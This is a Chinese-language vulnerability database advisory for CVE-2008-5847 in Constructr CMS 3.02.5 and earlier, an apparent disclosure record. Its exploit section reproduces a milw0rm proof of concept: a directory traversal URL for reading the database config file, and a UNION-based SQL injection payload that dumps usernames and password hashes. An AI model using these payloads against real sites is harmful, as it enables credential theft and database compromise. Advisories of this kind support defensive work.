constructr constructr-cms 信任管理漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117088 漏洞类型 信任管理
发布时间 2008-12-19 更新时间 2009-01-05
CVE编号 CVE-2008-5847 CNNVD-ID CNNVD-200901-035
漏洞平台 PHP CVSS评分 2.6
|漏洞来源
https://www.exploit-db.com/exploits/7529
https://www.securityfocus.com/bid/80783
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-035
|漏洞详情
ConstructrCMS3.02.5以及之前的版本在MySQL数据库的cleartext中储存密码,这使得见机行事的攻击者可以通过读取无用信息专栏,获得敏感信息。
|漏洞EXP
Constructr CMS
http://constructr-cms.org/

- <= 3.02.5 "Stable" -

magic_quotes_gpc = Off
register_globals = On

- Directory Traversal - Source Disclosure - Arbitrary File Creation - Etc Etc Etc -
http://site/constructr/backend/template.php?edit_file=

Db info:
../config/config.inc.php


- SQL -
http://site/constructr/?show_page=

User (urlencode) :
-0' UNION ALL SELECT NULL, CONCAT(CHAR(0),IFNULL(CAST(username AS CHAR(10000)), CHAR(32)),CHAR(0),IFNULL(CAST(hash AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL, NULL, NULL, NULL FROM constructr_user# AND 'tBkML'='tBkML
"Hash" is the password, not really encrypted...


- Timeline -
Author notified: Dec 12
Public Disclosure: Dec 19


- Seasons Greetings -
- http://nukeit.org -

# milw0rm.com [2008-12-19]
|受影响的产品
Constructr Constructr-Cms 3.2.5 Constructr Constructr-Cms 3.02.4 Constructr Constructr-Cms 3.02.3 Constructr Constructr-Cms 3.02.2 Constructr Constructr-Cms 3.02.1 Constr
|参考资料

来源:MILW0RM
名称:7529
链接:http://www.milw0rm.com/exploits/7529
来源:SREASON
名称:4868
链接:http://securityreason.com/securityalert/4868